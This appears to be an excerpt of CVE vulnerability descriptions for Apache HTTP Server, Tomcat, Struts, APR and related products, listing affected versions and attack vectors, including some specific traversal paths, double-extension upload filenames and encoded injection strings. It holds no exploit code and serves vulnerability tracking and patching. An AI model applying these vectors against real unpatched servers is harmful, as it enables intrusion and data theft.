| [CVE-2010-0390] Unrestricted file upload vulnerability in maxImageUpload/index.php in PHP F1 Max's Image Uploader 1.0, when Apache is not configured to handle the mime-type for files with pjpeg or jpeg extensions, allows remote attackers to execute arbitrary code by uploading a file with a pjpeg or jpeg extension, then accessing it via a direct request to the file in original/. NOTE: some of these details are obtained from third party information.
| [CVE-2010-0219] Apache Axis2, as used in dswsbobje.war in SAP BusinessObjects Enterprise XI 3.2, CA ARCserve D2D r15, and other products, has a default password of axis2 for the admin account, which makes it easier for remote attackers to execute arbitrary code by uploading a crafted web service.
| [CVE-2010-0010] Integer overflow in the ap_proxy_send_fb function in proxy/proxy_util.c in mod_proxy in the Apache HTTP Server before 1.3.42 on 64-bit platforms allows remote origin servers to cause a denial of service (daemon crash) or possibly execute arbitrary code via a large chunk size that triggers a heap-based buffer overflow.
| [CVE-2010-0009] Apache CouchDB 0.8.0 through 0.10.1 allows remote attackers to obtain sensitive information by measuring the completion time of operations that verify (1) hashes or (2) passwords.
| [CVE-2009-5120] The default configuration of Apache Tomcat in Websense Manager in Websense Web Security 7.0 and Web Filter 7.0 allows connections to TCP port 1812 from arbitrary source IP addresses, which makes it easier for remote attackers to conduct cross-site scripting (XSS) attacks via UTF-7 text to the 404 error page of a Project Woodstock service on this port.
| [CVE-2009-5119] The default configuration of Apache Tomcat in Websense Manager in Websense Web Security 7.0 and Web Filter 7.0 enables weak SSL ciphers in conf/server.xml, which makes it easier for remote attackers to obtain sensitive information by sniffing the network and then conducting a brute-force attack against encrypted session data.
| [CVE-2009-5006] The SessionAdapter::ExchangeHandlerImpl::checkAlternate function in broker/SessionAdapter.cpp in the C++ Broker component in Apache Qpid before 0.6, as used in Red Hat Enterprise MRG before 1.3 and other products, allows remote authenticated users to cause a denial of service (NULL pointer dereference, daemon crash, and cluster outage) by attempting to modify the alternate of an exchange.
| [CVE-2009-5005] The Cluster::deliveredEvent function in cluster/Cluster.cpp in Apache Qpid, as used in Red Hat Enterprise MRG before 1.3 and other products, allows remote attackers to cause a denial of service (daemon crash and cluster outage) via invalid AMQP data.
| [CVE-2009-4355] Memory leak in the zlib_stateful_finish function in crypto/comp/c_zlib.c in OpenSSL 0.9.8l and earlier and 1.0.0 Beta through Beta 4 allows remote attackers to cause a denial of service (memory consumption) via vectors that trigger incorrect calls to the CRYPTO_cleanup_all_ex_data function, as demonstrated by use of SSLv3 and PHP with the Apache HTTP Server, a related issue to CVE-2008-1678.
| [CVE-2009-4269] The password hash generation algorithm in the BUILTIN authentication functionality for Apache Derby before 10.6.1.0 performs a transformation that reduces the size of the set of inputs to SHA-1, which produces a small search space that makes it easier for local and possibly remote attackers to crack passwords by generating hash collisions, related to password substitution.
| [CVE-2009-3923] The VirtualBox 2.0.8 and 2.0.10 web service in Sun Virtual Desktop Infrastructure (VDI) 3.0 does not require authentication, which allows remote attackers to obtain unspecified access via vectors involving requests to an Apache HTTP Server.
| [CVE-2009-3890] Unrestricted file upload vulnerability in the wp_check_filetype function in wp-includes/functions.php in WordPress before 2.8.6, when a certain configuration of the mod_mime module in the Apache HTTP Server is enabled, allows remote authenticated users to execute arbitrary code by posting an attachment with a multiple-extension filename, and then accessing this attachment via a direct request to a wp-content/uploads/ pathname, as demonstrated by a .php.jpg filename.
| [CVE-2009-3843] HP Operations Manager 8.10 on Windows contains a "hidden account" in the XML file that specifies Tomcat users, which allows remote attackers to conduct unrestricted file upload attacks, and thereby execute arbitrary code, by using the org.apache.catalina.manager.HTMLManagerServlet class to make requests to manager/html/upload.
| [CVE-2009-3821] Cross-site scripting (XSS) vulnerability in the Apache Solr Search (solr) extension 1.0.0 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
| [CVE-2009-3555] The TLS protocol, and the SSL protocol 3.0 and possibly earlier, as used in Microsoft Internet Information Services (IIS) 7.0, mod_ssl in the Apache HTTP Server 2.2.14 and earlier, OpenSSL before 0.9.8l, GnuTLS 2.8.5 and earlier, Mozilla Network Security Services (NSS) 3.12.4 and earlier, multiple Cisco products, and other products, does not properly associate renegotiation handshakes with an existing connection, which allows man-in-the-middle attackers to insert data into HTTPS sessions, and possibly other types of sessions protected by TLS or SSL, by sending an unauthenticated request that is processed retroactively by a server in a post-renegotiation context, related to a "plaintext injection" attack, aka the "Project Mogul" issue.
| [CVE-2009-3548] The Windows installer for Apache Tomcat 6.0.0 through 6.0.20, 5.5.0 through 5.5.28, and possibly earlier versions uses a blank default password for the administrative user, which allows remote attackers to gain privileges.
| [CVE-2009-3250] The saveForwardAttachments procedure in the Compose Mail functionality in vtiger CRM 5.0.4 allows remote authenticated users to execute arbitrary code by composing an e-mail message with an attachment filename ending in (1) .php in installations based on certain Apache HTTP Server configurations, (2) .php. on Windows, or (3) .php/ on Linux, and then making a direct request to a certain pathname under storage/.
| [CVE-2009-3095] The mod_proxy_ftp module in the Apache HTTP Server allows remote attackers to bypass intended access restrictions and send arbitrary commands to an FTP server via vectors related to the embedding of these commands in the Authorization HTTP header, as demonstrated by a certain module in VulnDisco Pack Professional 8.11.
| [CVE-2009-3094] The ap_proxy_ftp_handler function in modules/proxy/proxy_ftp.c in the mod_proxy_ftp module in the Apache HTTP Server 2.0.63 and 2.2.13 allows remote FTP servers to cause a denial of service (NULL pointer dereference and child process crash) via a malformed reply to an EPSV command.
| [CVE-2009-2902] Directory traversal vulnerability in Apache Tomcat 5.5.0 through 5.5.28 and 6.0.0 through 6.0.20 allows remote attackers to delete work-directory files via directory traversal sequences in a WAR filename, as demonstrated by the ...war filename.
| [CVE-2009-2901] The autodeployment process in Apache Tomcat 5.5.0 through 5.5.28 and 6.0.0 through 6.0.20, when autoDeploy is enabled, deploys appBase files that remain from a failed undeploy, which might allow remote attackers to bypass intended authentication requirements via HTTP requests.
| [CVE-2009-2823] The Apache HTTP Server in Apple Mac OS X before 10.6.2 enables the HTTP TRACE method, which allows remote attackers to conduct cross-site scripting (XSS) attacks via unspecified web client software.
| [CVE-2009-2699] The Solaris pollset feature in the Event Port backend in poll/unix/port.c in the Apache Portable Runtime (APR) library before 1.3.9, as used in the Apache HTTP Server before 2.2.14 and other products, does not properly handle errors, which allows remote attackers to cause a denial of service (daemon hang) via unspecified HTTP requests, related to the prefork and event MPMs.
| [CVE-2009-2696] Cross-site scripting (XSS) vulnerability in jsp/cal/cal2.jsp in the calendar application in the examples web application in Apache Tomcat on Red Hat Enterprise Linux 5, Desktop Workstation 5, and Linux Desktop 5 allows remote attackers to inject arbitrary web script or HTML via the time parameter, related to "invalid HTML." NOTE: this is due to a missing fix for CVE-2009-0781.
| [CVE-2009-2693] Directory traversal vulnerability in Apache Tomcat 5.5.0 through 5.5.28 and 6.0.0 through 6.0.20 allows remote attackers to create or overwrite arbitrary files via a .. (dot dot) in an entry in a WAR file, as demonstrated by a ../../bin/catalina.bat entry.
| [CVE-2009-2625] XMLScanner.java in Apache Xerces2 Java, as used in Sun Java Runtime Environment (JRE) in JDK and JRE 6 before Update 15 and JDK and JRE 5.0 before Update 20, and in other products, allows remote attackers to cause a denial of service (infinite loop and application hang) via malformed XML input, as demonstrated by the Codenomicon XML fuzzing framework.
| [CVE-2009-2412] Multiple integer overflows in the Apache Portable Runtime (APR) library and the Apache Portable Utility library (aka APR-util) 0.9.x and 1.3.x allow remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via vectors that trigger crafted calls to the (1) allocator_alloc or (2) apr_palloc function in memory/unix/apr_pools.c in APR
| [CVE-2009-2299] The Artofdefence Hyperguard Web Application Firewall (WAF) module before 2.5.5-11635, 3.0 before 3.0.3-11636, and 3.1 before 3.1.1-11637, a module for the Apache HTTP Server, allows remote attackers to cause a denial of service (memory consumption) via an HTTP request with a large Content-Length value but no POST data.
| [CVE-2009-1956] Off-by-one error in the apr_brigade_vprintf function in Apache APR-util before 1.3.5 on big-endian platforms allows remote attackers to obtain sensitive information or cause a denial of service (application crash) via crafted input.
| [CVE-2009-1955] The expat XML parser in the apr_xml_* interface in xml/apr_xml.c in Apache APR-util before 1.3.7, as used in the mod_dav and mod_dav_svn modules in the Apache HTTP Server, allows remote attackers to cause a denial of service (memory consumption) via a crafted XML document containing a large number of nested entity references, as demonstrated by a PROPFIND request, a similar issue to CVE-2003-1564.
| [CVE-2009-1903] The PDF XSS protection feature in ModSecurity before 2.5.8 allows remote attackers to cause a denial of service (Apache httpd crash) via a request for a PDF file that does not use the GET method.
| [CVE-2009-1891] The mod_deflate module in Apache httpd 2.2.11 and earlier compresses large files until completion even after the associated network connection is closed, which allows remote attackers to cause a denial of service (CPU consumption).
| [CVE-2009-1890] The stream_reqbody_cl function in mod_proxy_http.c in the mod_proxy module in the Apache HTTP Server before 2.3.3, when a reverse proxy is configured, does not properly handle an amount of streamed data that exceeds the Content-Length value, which allows remote attackers to cause a denial of service (CPU consumption) via crafted requests.
| [CVE-2009-1885] Stack consumption vulnerability in validators/DTD/DTDScanner.cpp in Apache Xerces C++ 2.7.0 and 2.8.0 allows context-dependent attackers to cause a denial of service (application crash) via vectors involving nested parentheses and invalid byte values in "simply nested DTD structures," as demonstrated by the Codenomicon XML fuzzing framework.
| [CVE-2009-1462] The Security Manager in razorCMS before 0.4 does not verify the permissions of every file owned by the apache user account, which is inconsistent with the documentation and allows local users to have an unspecified impact.
| [CVE-2009-1275] Apache Tiles 2.1 before 2.1.2, as used in Apache Struts and other products, evaluates Expression Language (EL) expressions twice in certain circumstances, which allows remote attackers to conduct cross-site scripting (XSS) attacks or obtain sensitive information via unspecified vectors, related to the (1) tiles:putAttribute and (2) tiles:insertTemplate JSP tags.
| [CVE-2009-1195] The Apache HTTP Server 2.2.11 and earlier 2.2 versions does not properly handle Options=IncludesNOEXEC in the AllowOverride directive, which allows local users to gain privileges by configuring (1) Options Includes, (2) Options +Includes, or (3) Options +IncludesNOEXEC in a .htaccess file, and then inserting an exec element in a .shtml file.
| [CVE-2009-1191] mod_proxy_ajp.c in the mod_proxy_ajp module in the Apache HTTP Server 2.2.11 allows remote attackers to obtain sensitive response data, intended for a client that sent an earlier POST request with no request body, via an HTTP request.
| [CVE-2009-1012] Unspecified vulnerability in the plug-ins for Apache and IIS web servers in Oracle BEA WebLogic Server 7.0 Gold through SP7, 8.1 Gold through SP6, 9.0, 9.1, 9.2 Gold through MP3, 10.0 Gold through MP1, and 10.3 allows remote attackers to affect confidentiality, integrity, and availability. NOTE: the previous information was obtained from the April 2009 CPU. Oracle has not commented on claims from a reliable researcher that this is an integer overflow in an unspecified plug-in that parses HTTP requests, which leads to a heap-based buffer overflow.
| [CVE-2009-0918] Multiple unspecified vulnerabilities in DFLabs PTK 1.0.0 through 1.0.4 allow remote attackers to execute arbitrary commands in processes launched by PTK's Apache HTTP Server via (1) "external tools" or (2) a crafted forensic image.
| [CVE-2009-0796] Cross-site scripting (XSS) vulnerability in Status.pm in Apache::Status and Apache2::Status in mod_perl1 and mod_perl2 for the Apache HTTP Server, when /perl-status is accessible, allows remote attackers to inject arbitrary web script or HTML via the URI.
| [CVE-2009-0783] Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18 permits web applications to replace an XML parser used for other web applications, which allows local users to read or modify the (1) web.xml, (2) context.xml, or (3) tld files of arbitrary web applications via a crafted application that is loaded earlier than the target application.
| [CVE-2009-0781] Cross-site scripting (XSS) vulnerability in jsp/cal/cal2.jsp in the calendar application in the examples web application in Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18 allows remote attackers to inject arbitrary web script or HTML via the time parameter, related to "invalid HTML."
| [CVE-2009-0754] PHP 4.4.4, 5.1.6, and other versions, when running on Apache, allows local users to modify behavior of other sites hosted on the same web server by modifying the mbstring.func_overload setting within .htaccess, which causes this setting to be applied to other virtual hosts on the same server.
| [CVE-2009-0580] Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18, when FORM authentication is used, allows remote attackers to enumerate valid usernames via requests to /j_security_check with malformed URL encoding of passwords, related to improper error checking in the (1) MemoryRealm, (2) DataSourceRealm, and (3) JDBCRealm authentication realms, as demonstrated by a % (percent) value for the j_password parameter.
| [CVE-2009-0486] Bugzilla 3.2.1, 3.0.7, and 3.3.2, when running under mod_perl, calls the srand function at startup time, which causes Apache children to have the same seed and produce insufficiently random numbers for random tokens, which allows remote attackers to bypass cross-site request forgery (CSRF) protection mechanisms and conduct unauthorized activities as other users.
| [CVE-2009-0039] Multiple cross-site request forgery (CSRF) vulnerabilities in the web administration console in Apache Geronimo Application Server 2.1 through 2.1.3 allow remote attackers to hijack the authentication of administrators for requests that (1) change the web administration password, (2) upload applications, and perform unspecified other administrative actions, as demonstrated by (3) a Shutdown request to console/portal//Server/Shutdown.
| [CVE-2009-0038] Multiple cross-site scripting (XSS) vulnerabilities in the web administration console in Apache Geronimo Application Server 2.1 through 2.1.3 allow remote attackers to inject arbitrary web script or HTML via the (1) name, (2) ip, (3) username, or (4) description parameter to console/portal/Server/Monitoring
5375| [CVE-2009-0033] Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18, when the Java AJP connector and mod_jk load balancing are used, allows remote attackers to cause a denial of service (application outage) via a crafted request with invalid headers, related to temporary blocking of connectors that have encountered errors, as demonstrated by an error involving a malformed HTTP Host header.
5376| [CVE-2009-0026] Multiple cross-site scripting (XSS) vulnerabilities in Apache Jackrabbit before 1.5.2 allow remote attackers to inject arbitrary web script or HTML via the q parameter to (1) search.jsp or (2) swr.jsp.
5377| [CVE-2009-0023] The apr_strmatch_precompile function in strmatch/apr_strmatch.c in Apache APR-util before 1.3.5 allows remote attackers to cause a denial of service (daemon crash) via crafted input involving (1) a .htaccess file used with the Apache HTTP Server, (2) the SVNMasterURI directive in the mod_dav_svn module in the Apache HTTP Server, (3) the mod_apreq2 module for the Apache HTTP Server, or (4) an application that uses the libapreq2 library, which triggers a heap-based buffer underflow.
| [CVE-2008-6879] Cross-site scripting (XSS) vulnerability in Apache Roller 2.3, 3.0, 3.1, and 4.0 allows remote attackers to inject arbitrary web script or HTML via the q parameter in a search action.
| [CVE-2008-6755] ZoneMinder 1.23.3 on Fedora 10 sets the ownership of /etc/zm.conf to the apache user account, and sets the permissions to 0600, which makes it easier for remote attackers to modify this file by accessing it through a (1) PHP or (2) CGI script.
| [CVE-2008-6722] Novell Access Manager 3 SP4 does not properly expire X.509 certificate sessions, which allows physically proximate attackers to obtain a logged-in session by using a victim's web-browser process that continues to send the original and valid SSL sessionID, related to inability of Apache Tomcat to clear entries from its SSL cache.
| [CVE-2008-6682] Multiple cross-site scripting (XSS) vulnerabilities in Apache Struts 2.0.x before 2.0.11.1 and 2.1.x before 2.1.1 allow remote attackers to inject arbitrary web script or HTML via vectors associated with improper handling of (1) " (double quote) characters in the href attribute of an s:a tag and (2) parameters in the action attribute of an s:url tag.
| [CVE-2008-6505] Multiple directory traversal vulnerabilities in Apache Struts 2.0.x before 2.0.12 and 2.1.x before 2.1.3 allow remote attackers to read arbitrary files via a ..%252f (encoded dot dot slash) in a URI with a /struts/ path, related to (1) FilterDispatcher in 2.0.x and (2) DefaultStaticContentLoader in 2.1.x.
| [CVE-2008-6504] ParametersInterceptor in OpenSymphony XWork 2.0.x before 2.0.6 and 2.1.x before 2.1.2, as used in Apache Struts and other products, does not properly restrict # (pound sign) references to context objects, which allows remote attackers to execute Object-Graph Navigation Language (OGNL) statements and modify server-side context objects, as demonstrated by use of a \u0023 representation for the # character.
| [CVE-2008-5696] Novell NetWare 6.5 before Support Pack 8, when an OES2 Linux server is installed into the NDS tree, does not require a password for the ApacheAdmin console, which allows remote attackers to reconfigure the Apache HTTP Server via console operations.
| [CVE-2008-5676] Multiple unspecified vulnerabilities in the ModSecurity (aka mod_security) module 2.5.0 through 2.5.5 for the Apache HTTP Server, when SecCacheTransformations is enabled, allow remote attackers to cause a denial of service (daemon crash) or bypass the product's functionality via unknown vectors related to "transformation caching."
| [CVE-2008-5519] The JK Connector (aka mod_jk) 1.2.0 through 1.2.26 in Apache Tomcat allows remote attackers to obtain sensitive information via an arbitrary request from an HTTP client, in opportunistic circumstances involving (1) a request from a different client that included a Content-Length header but no POST data or (2) a rapid series of requests, related to noncompliance with the AJP protocol's requirements for requests containing Content-Length headers.
| [CVE-2008-5518] Multiple directory traversal vulnerabilities in the web administration console in Apache Geronimo Application Server 2.1 through 2.1.3 on Windows allow remote attackers to upload files to arbitrary directories via directory traversal sequences in the (1) group, (2) artifact, (3) version, or (4) fileType parameter to console/portal//Services/Repository (aka the Services/Repository portlet)
| [CVE-2008-5515] Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, 6.0.0 through 6.0.18, and possibly earlier versions normalizes the target pathname before filtering the query string when using the RequestDispatcher method, which allows remote attackers to bypass intended access restrictions and conduct directory traversal attacks via .. (dot dot) sequences and the WEB-INF directory in a Request.
| [CVE-2008-5457] Unspecified vulnerability in the Oracle BEA WebLogic Server Plugins for Apache, Sun and IIS web servers component in BEA Product Suite 10.3, 10.0 MP1, 9.2 MP3, 9.1, 9.0, 8.1 SP6, and 7.0 SP7 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.
| [CVE-2008-4308] The doRead method in Apache Tomcat 4.1.32 through 4.1.34 and 5.5.10 through 5.5.20 does not return a -1 to indicate when a certain error condition has occurred, which can cause Tomcat to send POST content from one request to a different request.
| [CVE-2008-4008] Unspecified vulnerability in the WebLogic Server Plugins for Apache component in BEA Product Suite 10.3, 10.0 MP1, 9.2 MP3, 9.1, 9.0, 8.1 SP6, 7.0 SP7, and 6.1 SP7 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors. NOTE: the previous information was obtained from the October 2008 CPU. Oracle has not commented on reliable researcher claims that this issue is a stack-based buffer overflow in the WebLogic Apache Connector, related to an invalid parameter.
| [CVE-2008-3666] Unspecified vulnerability in Sun Solaris 10 and OpenSolaris before snv_96 allows (1) context-dependent attackers to cause a denial of service (panic) via vectors involving creation of a crafted file and use of the sendfilev system call, as demonstrated by a file served by an Apache 2.2.x web server with EnableSendFile configured
| [CVE-2008-3271] Apache Tomcat 5.5.0 and 4.1.0 through 4.1.31 allows remote attackers to bypass an IP address restriction and obtain sensitive information via a request that is processed concurrently with another request but in a different thread, leading to an instance-variable overwrite associated with a "synchronization problem" and lack of thread safety, and related to RemoteFilterValve, RemoteAddrValve, and RemoteHostValve.
| [CVE-2008-3257] Stack-based buffer overflow in the Apache Connector (mod_wl) in Oracle WebLogic Server (formerly BEA WebLogic Server) 10.3 and earlier allows remote attackers to execute arbitrary code via a long HTTP version string, as demonstrated by a string after "POST /.jsp" in an HTTP request.
| [CVE-2008-2939] Cross-site scripting (XSS) vulnerability in proxy_ftp.c in the mod_proxy_ftp module in Apache 2.0.63 and earlier, and mod_proxy_ftp.c in the mod_proxy_ftp module in Apache 2.2.9 and earlier 2.2 versions, allows remote attackers to inject arbitrary web script or HTML via a wildcard in the last directory component in the pathname in an FTP URI.
| [CVE-2008-2938] Directory traversal vulnerability in Apache Tomcat 4.1.0 through 4.1.37, 5.5.0 through 5.5.26, and 6.0.0 through 6.0.16, when allowLinking and UTF-8 are enabled, allows remote attackers to read arbitrary files via encoded directory traversal sequences in the URI, a different vulnerability than CVE-2008-2370. NOTE: versions earlier than 6.0.18 were reported affected, but the vendor advisory lists 6.0.16 as the last affected version.
| [CVE-2008-2742] Unrestricted file upload in the mcpuk file editor (atk/attributes/fck/editor/filemanager/browser/mcpuk/connectors/php/config.php) in Achievo 1.2.0 through 1.3.2 allows remote attackers to execute arbitrary code by uploading a file with .php followed by a safe extension, then accessing it via a direct request to the file in the Achievo root directory. NOTE: this is only a vulnerability in environments that support multiple extensions, such as Apache with the mod_mime module enabled.
| [CVE-2008-2717] TYPO3 4.0.x before 4.0.9, 4.1.x before 4.1.7, and 4.2.x before 4.2.1, uses an insufficiently restrictive default fileDenyPattern for Apache, which allows remote attackers bypass security restrictions and upload configuration files such as .htaccess, or conduct file upload attacks using multiple extensions.
| [CVE-2008-2579] Unspecified vulnerability in the WebLogic Server Plugins for Apache, Sun and IIS web servers component in Oracle BEA Product Suite 10.0 MP1, 9.2 MP3, 9.1, 9.0, 8.1 SP6, 7.0 SP7, and 6.1 SP7 has unknown impact and remote attack vectors.
| [CVE-2008-2384] SQL injection vulnerability in mod_auth_mysql.c in the mod-auth-mysql (aka libapache2-mod-auth-mysql) module for the Apache HTTP Server 2.x, when configured to use a multibyte character set that allows a \ (backslash) as part of the character encoding, allows remote attackers to execute arbitrary SQL commands via unspecified inputs in a login request.
| [CVE-2008-2370] Apache Tomcat 4.1.0 through 4.1.37, 5.5.0 through 5.5.26, and 6.0.0 through 6.0.16, when a RequestDispatcher is used, performs path normalization before removing the query string from the URI, which allows remote attackers to conduct directory traversal attacks and read arbitrary files via a .. (dot dot) in a request parameter.
| [CVE-2008-2364] The ap_proxy_http_process_response function in mod_proxy_http.c in the mod_proxy module in the Apache HTTP Server 2.0.63 and 2.2.8 does not limit the number of forwarded interim responses, which allows remote HTTP servers to cause a denial of service (memory consumption) via a large number of interim responses.
| [CVE-2008-2168] Cross-site scripting (XSS) vulnerability in Apache 2.2.6 and earlier allows remote attackers to inject arbitrary web script or HTML via UTF-7 encoded URLs that are not properly handled when displaying the 403 Forbidden error page.
| [CVE-2008-2025] Cross-site scripting (XSS) vulnerability in Apache Struts before 1.2.9-162.31.1 on SUSE Linux Enterprise (SLE) 11, before 1.2.9-108.2 on SUSE openSUSE 10.3, before 1.2.9-198.2 on SUSE openSUSE 11.0, and before 1.2.9-162.163.2 on SUSE openSUSE 11.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors related to "insufficient quoting of parameters."
| [CVE-2008-1947] Cross-site scripting (XSS) vulnerability in Apache Tomcat 5.5.9 through 5.5.26 and 6.0.0 through 6.0.16 allows remote attackers to inject arbitrary web script or HTML via the name parameter (aka the hostname attribute) to host-manager/html/add.
| [CVE-2008-1734] Interpretation conflict in PHP Toolkit before 1.0.1 on Gentoo Linux might allow local users to cause a denial of service (PHP outage) and read contents of PHP scripts by creating a file with a one-letter lowercase alphabetic name, which triggers interpretation of a certain unquoted [a-z] argument as a matching shell glob for this name, rather than interpretation as the literal [a-z] regular-expression string, and consequently blocks the launch of the PHP interpreter within the Apache HTTP Server.
| [CVE-2008-1678] Memory leak in the zlib_stateful_init function in crypto/comp/c_zlib.c in libssl in OpenSSL 0.9.8f through 0.9.8h allows remote attackers to cause a denial of service (memory consumption) via multiple calls, as demonstrated by initial SSL client handshakes to the Apache HTTP Server mod_ssl that specify a compression algorithm.
| [CVE-2008-1232] Cross-site scripting (XSS) vulnerability in Apache Tomcat 4.1.0 through 4.1.37, 5.5.0 through 5.5.26, and 6.0.0 through 6.0.16 allows remote attackers to inject arbitrary web script or HTML via a crafted string that is used in the message argument to the HttpServletResponse.sendError method.
| [CVE-2008-0869] Cross-site scripting (XSS) vulnerability in BEA WebLogic Workshop 8.1 through SP6 and Workshop for WebLogic 9.0 through 10.0 allows remote attackers to inject arbitrary web script or HTML via a "framework defined request parameter" when using WebLogic Workshop or Apache Beehive NetUI framework with page flows.
| [CVE-2008-0732] The init script for Apache Geronimo on SUSE Linux follows symlinks when performing a chown operation, which might allow local users to obtain access to unspecified files or directories.
| [CVE-2008-0555] The ExpandCert function in Apache-SSL before apache_1.3.41+ssl_1.59 does not properly handle (1) '/' and (2) '=' characters in a Distinguished Name (DN) in a client certificate, which might allow remote attackers to bypass authentication via a crafted DN that triggers overwriting of environment variables.
| [CVE-2008-0457] Unrestricted file upload vulnerability in the FileUpload class running on the Symantec LiveState Apache Tomcat server, as used by Symantec Backup Exec System Recovery Manager 7.0 and 7.0.1, allows remote attackers to upload and execute arbitrary JSP files via unknown vectors.
| [CVE-2008-0456] CRLF injection vulnerability in the mod_negotiation module in the Apache HTTP Server 2.2.6 and earlier in the 2.2.x series, 2.0.61 and earlier in the 2.0.x series, and 1.3.39 and earlier in the 1.3.x series allows remote authenticated users to inject arbitrary HTTP headers and conduct HTTP response splitting attacks by uploading a file with a multi-line name containing HTTP header sequences and a file extension, which leads to injection within a (1) "406 Not Acceptable" or (2) "300 Multiple Choices" HTTP response when the extension is omitted in a request for the file.
| [CVE-2008-0455] Cross-site scripting (XSS) vulnerability in the mod_negotiation module in the Apache HTTP Server 2.2.6 and earlier in the 2.2.x series, 2.0.61 and earlier in the 2.0.x series, and 1.3.39 and earlier in the 1.3.x series allows remote authenticated users to inject arbitrary web script or HTML by uploading a file with a name containing XSS sequences and a file extension, which leads to injection within a (1) "406 Not Acceptable" or (2) "300 Multiple Choices" HTTP response when the extension is omitted in a request for the file.
| [CVE-2008-0128] The SingleSignOn Valve (org.apache.catalina.authenticator.SingleSignOn) in Apache Tomcat before 5.5.21 does not set the secure flag for the JSESSIONIDSSO cookie in an https session, which can cause the cookie to be sent in http requests and make it easier for remote attackers to capture this cookie.
| [CVE-2008-0005] mod_proxy_ftp in Apache 2.2.x before 2.2.7-dev, 2.0.x before 2.0.62-dev, and 1.3.x before 1.3.40-dev does not define a charset, which allows remote attackers to conduct cross-site scripting (XSS) attacks using UTF-7 encoding.
| [CVE-2008-0002] Apache Tomcat 6.0.0 through 6.0.15 processes parameters in the context of the wrong request when an exception occurs during parameter processing, which might allow remote attackers to obtain sensitive information, as demonstrated by disconnecting during this processing in order to trigger the exception.
| [CVE-2007-6750] The Apache HTTP Server 1.x and 2.x allows remote attackers to cause a denial of service (daemon outage) via partial HTTP requests, as demonstrated by Slowloris, related to the lack of the mod_reqtimeout module in versions before 2.2.15.
| [CVE-2007-6726] Multiple cross-site scripting (XSS) vulnerabilities in Dojo 0.4.1 and 0.4.2, as used in Apache Struts and other products, allow remote attackers to inject arbitrary web script or HTML via unspecified vectors involving (1) xip_client.html and (2) xip_server.html in src/io/.
| [CVE-2007-6514] Apache HTTP Server, when running on Linux with a document root on a Windows share mounted using smbfs, allows remote attackers to obtain unprocessed content such as source files for .php programs via a trailing "\" (backslash), which is not handled by the intended AddType directive.
| [CVE-2007-6423] ** DISPUTED ** Unspecified vulnerability in mod_proxy_balancer for Apache HTTP Server 2.2.x before 2.2.7-dev, when running on Windows, allows remote attackers to trigger memory corruption via a long URL. NOTE: the vendor could not reproduce this issue.
| [CVE-2007-6422] The balancer_handler function in mod_proxy_balancer in the Apache HTTP Server 2.2.0 through 2.2.6, when a threaded Multi-Processing Module is used, allows remote authenticated users to cause a denial of service (child process crash) via an invalid bb variable.
| [CVE-2007-6421] Cross-site scripting (XSS) vulnerability in balancer-manager in mod_proxy_balancer in the Apache HTTP Server 2.2.0 through 2.2.6 allows remote attackers to inject arbitrary web script or HTML via the (1) ss, (2) wr, or (3) rr parameters, or (4) the URL.
| [CVE-2007-6420] Cross-site request forgery (CSRF) vulnerability in the balancer-manager in mod_proxy_balancer for Apache HTTP Server 2.2.x allows remote attackers to gain privileges via unspecified vectors.
| [CVE-2007-6388] Cross-site scripting (XSS) vulnerability in mod_status in the Apache HTTP Server 2.2.0 through 2.2.6, 2.0.35 through 2.0.61, and 1.3.2 through 1.3.39, when the server-status page is enabled, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
| [CVE-2007-6361] Gekko 0.8.2 and earlier stores sensitive information under the web root with possibly insufficient access control, which might allow remote attackers to read certain files under temp/, as demonstrated by a log file that records the titles of blog entries. NOTE: access to temp/ is blocked by .htaccess in most deployments that use Apache HTTP Server.
| [CVE-2007-6342] SQL injection vulnerability in the David Castro AuthCAS module (AuthCAS.pm) 0.4 for the Apache HTTP Server allows remote attackers to execute arbitrary SQL commands via the SESSION_COOKIE_NAME (session ID) in a cookie.
| [CVE-2007-6286] Apache Tomcat 5.5.11 through 5.5.25 and 6.0.0 through 6.0.15, when the native APR connector is used, does not properly handle an empty request to the SSL port, which allows remote attackers to trigger handling of "a duplicate copy of one of the recent requests," as demonstrated by using netcat to send the empty request.
| [CVE-2007-6258] Multiple stack-based buffer overflows in the legacy mod_jk2 2.0.3-DEV and earlier Apache module allow remote attackers to execute arbitrary code via a long (1) Host header, or (2) Hostname within a Host header.
| [CVE-2007-6231] Multiple PHP remote file inclusion vulnerabilities in tellmatic 1.0.7 allow remote attackers to execute arbitrary PHP code via a URL in the tm_includepath parameter to (1) Classes.inc.php, (2) statistic.inc.php, (3) status.inc.php, (4) status_top_x.inc.php, or (5) libchart-1.1/libchart.php in include/. NOTE: access to include/ is blocked by .htaccess in most deployments that use Apache HTTP Server.
| [CVE-2007-6203] Apache HTTP Server 2.0.x and 2.2.x does not sanitize the HTTP Method specifier header from an HTTP request when it is reflected back in a "413 Request Entity Too Large" error message, which might allow cross-site scripting (XSS) style attacks using web client components that can send arbitrary headers in requests, as demonstrated via an HTTP request containing an invalid Content-length value, a similar issue to CVE-2006-3918.
| [CVE-2007-5797] SQLLoginModule in Apache Geronimo 2.0 through 2.1 does not throw an exception for a nonexistent username, which allows remote attackers to bypass authentication via a login attempt with any username not contained in the database.
| [CVE-2007-5731] Absolute path traversal vulnerability in Apache Jakarta Slide 2.1 and earlier allows remote authenticated users to read arbitrary files via a WebDAV write request that specifies an entity with a SYSTEM tag, a related issue to CVE-2007-5461.
| [CVE-2007-5461] Absolute path traversal vulnerability in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0, 5.0.0, 5.5.0 through 5.5.25, and 6.0.0 through 6.0.14, under certain configurations, allows remote authenticated users to read arbitrary files via a WebDAV write request that specifies an entity with a SYSTEM tag.
